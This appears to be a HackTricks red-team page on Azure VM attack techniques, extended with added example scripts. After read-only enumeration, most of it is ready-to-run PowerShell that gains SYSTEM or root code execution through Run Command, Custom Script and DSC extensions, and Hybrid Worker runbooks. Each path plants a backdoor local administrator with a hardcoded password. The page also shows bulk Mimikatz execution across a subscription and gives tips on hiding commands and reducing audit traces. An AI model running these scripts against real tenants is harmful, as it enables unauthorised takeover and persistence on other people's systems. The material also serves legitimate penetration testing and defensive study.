{% hint style="success" %}
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
{% endhint %}
From the docs: Azure virtual machines are one of several types of on-demand, scalable computing resources that Azure offers. Typically, you choose a virtual machine when you need more control over the computing environment than the other choices offer. This article gives you information about what you should consider before you create a virtual machine, how you create it, and how you manage it.
Azure networking is made of several entities (virtual networks, subnets, NSGs, public IPs, peerings...) with different ways to configure them. Brief descriptions, examples and enumeration commands for each of them can be found in:
{% content-ref url="az-azure-network.md" %} az-azure-network.md {% endcontent-ref %}
Azure Bastion is a fully managed service that provides RDP and SSH access to VMs over TLS (HTTPS, port 443) through the Azure portal. It is deployed inside a Virtual Network and connects to VMs by their private IPs, so the VMs need neither a public IP nor NSG rules exposing 3389/22 to the Internet. Users and administrators reach the VM from the browser (or with the `az network bastion ssh`/`rdp` CLI tunnel) instead of through a public IP, which is why finding a Bastion host tells you which private VMs are reachable that way.
To list all Azure Bastion hosts in the current subscription:
{% code overflow="wrap" %}
```bash
az network bastion list --query "[].{name:name, resourceGroup:resourceGroup, location:location, vnet:ipConfigurations[0].subnet.id}" -o table
```
{% endcode %}
```powershell
# List the VMs readable with the current credentials
Get-AzVM | fl
# List running VMs (PowerState is only populated when -Status is used;
# Get-AzureRmVM from the retired AzureRM module behaves the same way)
Get-AzVM -Status | where {$_.PowerState -eq "VM running"} | select ResourceGroupName,Name
# Full details of one VM (OS, identity, extensions, disks...)
Get-AzVM -Name <name> -ResourceGroupName <res_group_name> | fl *
# Network interfaces attached to the VM (only the NIC resource ids are stored here)
Get-AzVM -Name <name> -ResourceGroupName <res_group_name> | select -ExpandProperty NetworkProfile
# Get the interface (private IP, subnet, NSG) and the public IP resource it references
Get-AzNetworkInterface -Name <interface_name> -ResourceGroupName <res_group_name>
Get-AzPublicIpAddress -Name <public_ip_name> -ResourceGroupName <res_group_name>
# Get installed extensions (AAD login, custom script, DSC, hybrid worker...)
Get-AzVMExtension -ResourceGroupName <res_group_name> -VMName <name>
```
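The commands above inspect one object at a time; the following is an added example (not code from the original page) that walks every VM visible to the current Az context and collects what is usually triaged first: power state, OS, private and public IPs, whether a managed identity is attached and which extensions are installed. It assumes Az.Compute and Az.Network are loaded and `Connect-AzAccount` has already been run; it is read-only.

```powershell
# Added example: one read-only pass over every readable VM in the current context.
# Assumes Az.Compute + Az.Network and an existing Az login; nothing is modified.
function Get-VMTriage {
    foreach ($vm in (Get-AzVM -Status)) {
        # -Status gives PowerState but a trimmed object; fetch the full model for the rest
        $full = Get-AzVM -ResourceGroupName $vm.ResourceGroupName -Name $vm.Name
        $privateIps = @(); $publicIps = @()
        foreach ($nicRef in $full.NetworkProfile.NetworkInterfaces) {
            $nic = Get-AzNetworkInterface -ResourceId $nicRef.Id
            foreach ($cfg in $nic.IpConfigurations) {
                $privateIps += $cfg.PrivateIpAddress
                if ($cfg.PublicIpAddress) {
                    # The NIC only holds the public IP resource id:
                    # /subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.Network/publicIPAddresses/<name>
                    $parts = $cfg.PublicIpAddress.Id -split '/'
                    $pip = Get-AzPublicIpAddress -ResourceGroupName $parts[4] -Name $parts[-1]
                    $publicIps += $pip.IpAddress
                }
            }
        }
        $ext = Get-AzVMExtension -ResourceGroupName $vm.ResourceGroupName -VMName $vm.Name
        [pscustomobject]@{
            Name          = $vm.Name
            ResourceGroup = $vm.ResourceGroupName
            PowerState    = $vm.PowerState
            OS            = $full.StorageProfile.OsDisk.OsType
            PrivateIPs    = ($privateIps -join ',')
            PublicIPs     = ($publicIps -join ',')
            # A managed identity means code executed on the VM can request Azure tokens for it
            Identity      = $full.Identity.Type
            # AADLoginForWindows / AADSSHLoginForLinux here means Azure AD login is enabled
            Extensions    = ($ext.ExtensionType -join ',')
        }
    }
}

Get-VMTriage | Format-Table -AutoSize
```

Public IPs are resolved by parsing the resource id because the NIC object carries only the reference, not the address; `Get-AzVM -Status` is used for the listing because the plain listing does not populate `PowerState`.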
VMs can also be configured to accept logins from Azure AD users. For example, to SSH into a Linux VM with such a user you pass the account's full UPN (user plus Azure AD domain, not a local username) as the login name: `ssh <user>@<aad_domain>@1.1.1.1`. If Azure AD login is enabled on the VM you will get a device-code prompt like:
{% code overflow="wrap" %}
```
(<user>@<aad_domain>@1.1.1.1) This preview capability is not for production use. When you sign in, verify the name of the app on the sign-in screen is "Azure Linux VM Sign-in" and the IP address of the target VM is correct.
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code DT4PNSTGR to authenticate. Press ENTER when ready.
```
{% endcode %}
Follow those instructions: open https://microsoft.com/devicelogin, enter the code and authenticate with the user's email and password. The SSH session is then established, provided the user holds one of the two roles that grant the login on that VM (directly or inherited from the resource group, subscription or management group): Virtual Machine Administrator Login (sudo/local admin) or Virtual Machine User Login (unprivileged user).
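To see in advance whether a given VM will accept an Azure AD login and which identities hold one of the two roles, the following added example (not code from the original page) checks for the login extension and lists the relevant role assignments at the VM scope. It assumes Az.Compute and Az.Resources; the resource group and VM name are placeholders.

```powershell
# Added example: who can log into this VM through Azure AD? Read-only.
# Assumes Az.Compute + Az.Resources; 'Research' / 'infradminsrv' are placeholders.
$rg = 'Research'; $vmName = 'infradminsrv'
$vm = Get-AzVM -ResourceGroupName $rg -Name $vmName

# The login broker is an extension; without it the roles below grant nothing on the host
$loginExt = Get-AzVMExtension -ResourceGroupName $rg -VMName $vmName |
    Where-Object { $_.ExtensionType -in 'AADLoginForWindows', 'AADSSHLoginForLinux' }
if (-not $loginExt) {
    Write-Warning "No Azure AD login extension on $vmName; the roles below cannot be used to log in"
} else {
    "Azure AD login extension: $($loginExt.ExtensionType) ($($loginExt.ProvisioningState))"
}

# Assignments effective at the VM, including those inherited from RG / subscription / MG
$loginRoles = 'Virtual Machine Administrator Login', 'Virtual Machine User Login'
Get-AzRoleAssignment -Scope $vm.Id |
    Where-Object { $_.RoleDefinitionName -in $loginRoles } |
    Select-Object DisplayName, SignInName, ObjectType, RoleDefinitionName, Scope |
    Format-Table -AutoSize
```

Groups and service principals show up here as well, so an assignment to a group whose membership you control is as good as a direct one. On a Windows VM with `AADLoginForWindows` the same roles are used over RDP, with the username entered as `AzureAD\<user>@<aad_domain>`.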
```powershell
# The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action
# (the script runs as SYSTEM on Windows and as root on Linux)
Invoke-AzVMRunCommand -ScriptPath .\adduser.ps1 -CommandId 'RunPowerShellScript' -VMName 'juastavm' -ResourceGroupName 'Research' -Verbose
## Another way (retired AzureRM module, same parameters)
Invoke-AzureRmVMRunCommand -ScriptPath .\adduser.ps1 -CommandId 'RunPowerShellScript' -VMName 'juastavm' -ResourceGroupName 'Research' -Verbose

# Content of the script (adduser.ps1): create a local admin
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
New-LocalUser -Name new_user -Password $passwd
Add-LocalGroupMember -Group Administrators -Member new_user

# Try to run a script in every VM of the subscription with MicroBurst
Import-Module .\MicroBurst.psm1
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt
```
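The page shows the Windows case with a script file on disk. The following added example (not code from the original page) wraps `Invoke-AzVMRunCommand` so that it picks the right `CommandId` for the guest OS (`RunShellScript` on Linux, `RunPowerShellScript` on Windows), sends the script inline and returns stdout and stderr as an object. It assumes Az.Compute and that the caller holds `Microsoft.Compute/virtualMachines/runCommand/action` on the VM; the resource group and VM name are placeholders.

```powershell
# Added example: OS-aware wrapper over Invoke-AzVMRunCommand that returns the guest output.
# Assumes Az.Compute and the runCommand/action permission on the target VM.
function Invoke-GuestScript {
    param(
        [Parameter(Mandatory)] [string] $ResourceGroupName,
        [Parameter(Mandatory)] [string] $VMName,
        [Parameter(Mandatory)] [string] $Script
    )
    $vm = Get-AzVM -ResourceGroupName $ResourceGroupName -Name $VMName
    $commandId = if ($vm.StorageProfile.OsDisk.OsType -eq 'Linux') { 'RunShellScript' } else { 'RunPowerShellScript' }

    # Run commands execute as SYSTEM (Windows) or root (Linux) inside the guest.
    # -ScriptString avoids writing a payload file on the operator machine.
    $result = Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName `
        -CommandId $commandId -ScriptString $Script

    # Value[0] is stdout, Value[1] is stderr; the service only keeps the last 4 KB of each
    [pscustomobject]@{
        VM     = $VMName
        Status = $result.Status
        StdOut = $result.Value[0].Message
        StdErr = $result.Value[1].Message
    }
}

# Usage: same payload the page uses, sent inline, followed by whoami to confirm the context
Invoke-GuestScript -ResourceGroupName 'Research' -VMName 'juastavm' -Script @'
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
New-LocalUser -Name new_user -Password $passwd
Add-LocalGroupMember -Group Administrators -Member new_user
whoami
'@
```

Each invocation is recorded in the subscription Activity Log under the operation `Microsoft.Compute/virtualMachines/runCommand/action` with the caller's identity, which is what defenders key on; the script body itself is not logged there.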
Azure VM extensions are small agents that perform post-deployment configuration and automation on a VM: installing software, antivirus, or running a script inside the guest. They execute as SYSTEM on Windows and as root on Linux, so anyone who can write an extension to a VM (`Microsoft.Compute/virtualMachines/extensions/write`) can run arbitrary code on it:
```powershell
# Microsoft.Compute/virtualMachines/extensions/write
# Windows: publisher Microsoft.Compute, type CustomScriptExtension. -Location must match the VM's region.
# Note that commandToExecute in -SettingString is stored in clear text and readable by anyone
# who can read the VM (use -ProtectedSettingString to have it encrypted and not returned by the API).
Set-AzVMExtension -ResourceGroupName "Research" -ExtensionName "ExecCmd" -VMName "infradminsrv" -Location "Germany West Central" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add"}'
```
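The same technique for a Linux VM uses a different publisher, type and version, and the following added example (not code from the original page) also puts the command in the protected settings, reads the extension status back and removes the extension afterwards. It assumes Az.Compute, the `extensions/write` permission (and `extensions/delete` for the cleanup) and a Debian/Ubuntu guest where the admin group is `sudo`; resource group and VM name are placeholders.

```powershell
# Added example: Custom Script extension on a Linux VM with the command in protectedSettings,
# then status read-back and cleanup. Assumes Az.Compute and extensions/write + extensions/delete.
$rg = 'Research'; $vmName = 'linuxsrv'
$location = (Get-AzVM -ResourceGroupName $rg -Name $vmName).Location

# Linux: publisher Microsoft.Azure.Extensions, type CustomScript, handler 2.x (Windows uses
# Microsoft.Compute / CustomScriptExtension as in the command above)
$cmd = 'useradd -m new_user; echo "new_user:Welcome2022!" | chpasswd; usermod -aG sudo new_user'
Set-AzVMExtension -ResourceGroupName $rg -VMName $vmName -Location $location -Name 'ExecCmd' `
    -Publisher 'Microsoft.Azure.Extensions' -ExtensionType 'CustomScript' -TypeHandlerVersion '2.1' `
    -ProtectedSettingString (@{ commandToExecute = $cmd } | ConvertTo-Json -Compress)

# Provisioning state plus the handler's own status messages; on the guest, stdout/stderr land in
# /var/lib/waagent/custom-script/download/<n>/
$ext = Get-AzVMExtension -ResourceGroupName $rg -VMName $vmName -Name 'ExecCmd' -Status
"ProvisioningState: $($ext.ProvisioningState)"
$ext.Statuses | Select-Object Code, Message

# Removing the extension does not undo what the command did, but leaves fewer artefacts on the
# resource. The write and delete are still both recorded in the Activity Log.
Remove-AzVMExtension -ResourceGroupName $rg -VMName $vmName -Name 'ExecCmd' -Force
```

Protected settings are encrypted with a VM-specific certificate and are never returned by `Get-AzVMExtension` or the portal, so the payload is visible only to someone with access to the guest, unlike the `-SettingString` form above.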
Desired State Configuration (DSC) is a PowerShell configuration-management tool, comparable to Ansible, that describes the state of a host as code. Azure exposes it through the DSC VM extension, which consumes configuration archives uploaded with the Publish-AzVMDscConfiguration function of Az PowerShell. The archive must be a .zip containing a .ps1 file that defines a function. What matters from an attacker's point of view is that the .ps1 does not need to be valid DSC syntax: as long as the file meets those formatting requirements, the PowerShell inside the function is still executed by the extension, as shown in the provided figure. The extension then reports the run as a "failure" and none of the command output is visible, because the status is overwritten by the failure message, so the only way to confirm execution is through its side effects.
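The following added example (not code from the original page or from the referenced blog post) runs that flow end to end: a .ps1 whose "configuration" is a plain function, packaged and uploaded with `Publish-AzVMDscConfiguration`, then applied with `Set-AzVMDscExtension`. It assumes Az.Compute, an existing storage account the caller can write to (`dscstore` is a placeholder), the `extensions/write` permission on the VM, and that the function name is what `-ConfigurationName` must match; the DSC handler version `2.83` is a placeholder for any current 2.x release.

```powershell
# Added example: arbitrary PowerShell through the DSC extension. Assumes Az.Compute, a writable
# storage account 'dscstore' in RG 'Research' (placeholders) and extensions/write on the VM.
@'
function AddUser {
    # Ordinary PowerShell, not DSC resource syntax; it still runs as SYSTEM
    net user new_user Welcome2022. /add /Y
    net localgroup administrators new_user /add
}
'@ | Set-Content -Path .\AddUser.ps1

# Zips the script as AddUser.ps1.zip and uploads it to the storage account
# (container 'windows-powershell-dsc' is created if needed)
Publish-AzVMDscConfiguration -ConfigurationPath .\AddUser.ps1 `
    -ResourceGroupName 'Research' -StorageAccountName 'dscstore' -Force

# The DSC extension downloads the archive and invokes the named function
Set-AzVMDscExtension -ResourceGroupName 'Research' -VMName 'infradminsrv' -Name 'Microsoft.Powershell.DSC' `
    -ArchiveBlobName 'AddUser.ps1.zip' -ArchiveStorageAccountName 'dscstore' -ArchiveResourceGroupName 'Research' `
    -ConfigurationName 'AddUser' -Version '2.83' -Location 'Germany West Central' -Force

# Expect 'Failed' and no output even though the commands ran; verify through the side effect
(Get-AzVMExtension -ResourceGroupName 'Research' -VMName 'infradminsrv' -Name 'Microsoft.Powershell.DSC' -Status).ProvisioningState
Invoke-AzVMRunCommand -ResourceGroupName 'Research' -VMName 'infradminsrv' -CommandId 'RunPowerShellScript' `
    -ScriptString 'net localgroup administrators' | ForEach-Object { $_.Value[0].Message }
```

Because the extension reports a failure, this path is noisier in monitoring than a successful Custom Script run, but it needs only the same `extensions/write` permission plus somewhere to host the archive.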
VM Application Definitions (part of Azure Compute Gallery) allow repeatable deployment of versioned applications to Azure VMs, including updating them across many VMs. Setting one up takes several steps built around New-AzGalleryApplication and New-AzGalleryApplicationVersion in Az PowerShell.
Execution through this path relies on the "VMAppExtension", which is installed automatically when an application is assigned to a VM. The extension downloads the file from the URI given in the application version and stores it under the application's name with no file extension, so to have it executed the `manageActions` (install/remove/update) in the REST API call must rename the file to the proper extension and run it. Once complete, the setup resembles the structure shown in the provided figure.
This method is relatively slow, taking about 3-4 minutes per application or command. On the VM the downloaded application is kept in C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.4\Downloads\ and the execution status in C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindows\1.0.4\Status\ (the version directory changes with the extension version).
Both DSC and VM Applications provide execution on the VM without touching the Run Command or Custom Script paths, each with its own requirements, steps and telemetry.
Hybrid Worker Groups (HWGs) let runbooks defined in an Automation Account execute on Azure VMs that have been registered into the group. The hybrid worker extension installed on the VM pulls the runbook code down and runs it locally. The credentials of whoever starts the job are not what determines what the code can do on the host: the runbook runs as SYSTEM on Windows or root on Linux, as illustrated in the provided figure, so control of the Automation Account (or the permission to start runbooks on the group) is code execution as the highest local privilege on every worker.
A practical detail for Windows 10 workers is that the runbook must be set to run as PowerShell 5.1 rather than 7.1: PowerShell 7.x is not installed by default on those VMs, so a runbook that specifies 7.1 fails to execute.
Azure offers this as a way of centrally automating tasks across hybrid environments, which is exactly what makes it a convenient execution channel on the VMs enrolled in it.
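The following added example (not code from the original page) performs the technique with Az.Automation: it lists which VMs are workers, imports and publishes a PowerShell 5.1 runbook, starts it on the hybrid worker group and collects the job output. It assumes an Automation Account `autoacct` in resource group `Research` with a hybrid worker group `hwg-prod` (all placeholders) and rights to create and start runbooks on it.

```powershell
# Added example: run a runbook on a hybrid worker so it executes as SYSTEM on the VM.
# Assumes Az.Automation; 'Research' / 'autoacct' / 'hwg-prod' are placeholders.
$rg = 'Research'; $aa = 'autoacct'; $hwg = 'hwg-prod'

# Which VMs are registered as workers, i.e. reachable through this channel
Get-AzAutomationHybridWorkerGroup -ResourceGroupName $rg -AutomationAccountName $aa |
    Select-Object Name, @{ n = 'Workers'; e = { $_.RunbookWorker.Name -join ',' } }

# Plain PowerShell runbook (-Type PowerShell = 5.1), which is what Windows 10 workers can run
@'
whoami
net user new_user Welcome2022. /add /Y
net localgroup administrators new_user /add
'@ | Set-Content -Path .\hwg-adduser.ps1

Import-AzAutomationRunbook -ResourceGroupName $rg -AutomationAccountName $aa -Path .\hwg-adduser.ps1 `
    -Name 'hwg-adduser' -Type PowerShell -Published -Force

# -RunOn sends the job to the hybrid worker group instead of the Azure sandbox
$job = Start-AzAutomationRunbook -ResourceGroupName $rg -AutomationAccountName $aa -Name 'hwg-adduser' -RunOn $hwg

do {
    Start-Sleep -Seconds 10
    $job = Get-AzAutomationJob -ResourceGroupName $rg -AutomationAccountName $aa -Id $job.JobId
} until ($job.Status -in 'Completed', 'Failed', 'Stopped', 'Suspended')

# The whoami line should read nt authority\system
Get-AzAutomationJobOutput -ResourceGroupName $rg -AutomationAccountName $aa -Id $job.JobId -Stream Any |
    Select-Object Type, Summary
```

Runbook creation, publication and the job start are all recorded against the Automation Account rather than the VM, so reviewers looking only at VM-level operations (run commands, extension writes) will not see this path.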
- https://learn.microsoft.com/en-us/azure/virtual-machines/overview
- https://hausec.com/2022/05/04/azure-virtual-machine-execution-techniques/